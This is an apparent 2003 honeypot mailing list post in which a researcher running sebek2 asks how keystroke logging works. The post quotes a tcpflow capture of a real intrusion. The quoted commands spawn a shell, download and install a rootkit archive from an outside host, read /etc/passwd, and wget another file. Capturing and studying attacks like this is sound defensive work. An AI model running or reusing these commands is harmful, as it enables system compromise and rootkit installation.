Honeypots mailing list archives
keystroke recording
From: Shibuya Yoshihiro <yashibu () sfc keio ac jp>
Date: Tue, 02 Sep 2003 03:03:54 +0900
Hi, I am deploying GenII Honeypot and recording attacks by using sebek2. And I got some keystroke but I found some keystrokes which sebek2 cannot record. I also using tcpflow, tcpflow recorded attack scripts and after keystrokes. Follow is scripts which tcpflow got (Sebek2 cannot records) --- tcpflow log start ---
(Buffer overflow attack scripts) TERM=xterm; export TERM=xterm; exec bash -i
lynx -source http://debbyzalina.com/exploits/tools/shv4.tar.gz > shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup cyber2002x 51437 ;uname -a; id;
caat /etc/hosts cd /tmp ls -a cat /etc/*ease cat /etc/passwd cat /etc/*ease wget http://e-wac.tripod.com/panjie/huhuy k a0 ls - cat /etc/hosts w
--- tcpflow log end --- I caught 50 times such a attack-keystroke sets for port443(apache-1.3.20) in 4 days, and an attacker made some accounts, login honeypot, so I could get sebek2 keystroke saving. Please tell me what mechanism of keystroke saving (including scbek2 mechanism). Regards.
Current thread:
- keystroke recording Shibuya Yoshihiro (Sep 01)